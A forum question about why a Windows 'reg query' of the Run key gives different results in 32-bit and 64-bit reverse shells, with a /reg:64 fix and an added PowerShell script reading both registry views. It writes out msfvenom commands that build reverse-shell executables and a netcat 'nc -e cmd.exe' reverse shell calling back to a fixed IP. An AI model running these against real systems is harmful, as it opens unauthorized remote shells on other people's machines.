Got a curious issue I’m hoping to get an answer to. I’m doing a reverse shell using msfvenom. Depending on how I create it, the following command will or will not show results:
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
If I use the following reverse shell, that command returns the contents of the registry key:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.16.20.1 LPORT=4343 -f exe -o revshell.exe
But if I use this or just create a netcat shell (nc 172.16.20.1 4343 -e cmd.exe), the reg query fails:
msfvenom -p windows/shell_reverse_tcp LHOST=172.16.20.1 LPORT=4343 -f exe -o revshell.exe
The Windows OS is 64-bit so I’m assuming it has something to do with that, but I’d like to get a better understanding of why one works and the other doesn’t. Can someone offer some guidance?
Update:
To get that to work, you can append /reg:64 to the end of the reg query:
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /reg:64
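Added example, not part of the original post: a PowerShell script that reports whether the current shell is a WOW64 (32-bit) process on 64-bit Windows and reads the Run key from both the 64-bit and the 32-bit registry view, which is what /reg:64 and /reg:32 select for reg.exe. It assumes a 64-bit Windows host and uses the key path from the question; the function name Get-RunEntries is this example's own.

```powershell
# A 32-bit process on 64-bit Windows runs under WOW64, and its registry access to
# HKLM\SOFTWARE is redirected to the Wow6432Node view unless an explicit view is
# requested. That is why the 32-bit payload's 'reg query' shows different contents
# than the x64 payload's, and why '/reg:64' makes them agree.
$isWow64 = [Environment]::Is64BitOperatingSystem -and -not [Environment]::Is64BitProcess
Write-Host ("64-bit OS: {0}  64-bit process: {1}  running under WOW64: {2}" -f
    [Environment]::Is64BitOperatingSystem, [Environment]::Is64BitProcess, $isWow64)

function Get-RunEntries {
    param(
        [Parameter(Mandatory)][Microsoft.Win32.RegistryView]$View,
        # Key path from the question (relative to HKLM)
        [string]$SubKey = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    )
    # OpenBaseKey with an explicit RegistryView bypasses WOW64 redirection,
    # the API-level equivalent of 'reg query ... /reg:64' or '/reg:32'.
    $base = [Microsoft.Win32.RegistryKey]::OpenBaseKey(
        [Microsoft.Win32.RegistryHive]::LocalMachine, $View)
    try {
        $key = $base.OpenSubKey($SubKey)
        if ($null -eq $key) { return @() }   # key absent in this view
        try {
            foreach ($name in $key.GetValueNames()) {
                [pscustomobject]@{
                    View    = $View
                    Name    = $name
                    Command = $key.GetValue($name)
                }
            }
        } finally { $key.Close() }
    } finally { $base.Close() }
}

# A persistence review of autostart entries should cover both views: a 32-bit
# shell or tool that does not ask for a specific view only ever sees the
# Wow6432Node copy and silently misses 64-bit Run entries.
$entries = @(Get-RunEntries -View ([Microsoft.Win32.RegistryView]::Registry64)) +
           @(Get-RunEntries -View ([Microsoft.Win32.RegistryView]::Registry32))
$entries | Format-Table -AutoSize
```

Run it from both a 32-bit and a 64-bit PowerShell on the same host to see the WOW64 flag change while the enumerated entries stay the same, because the views are requested explicitly.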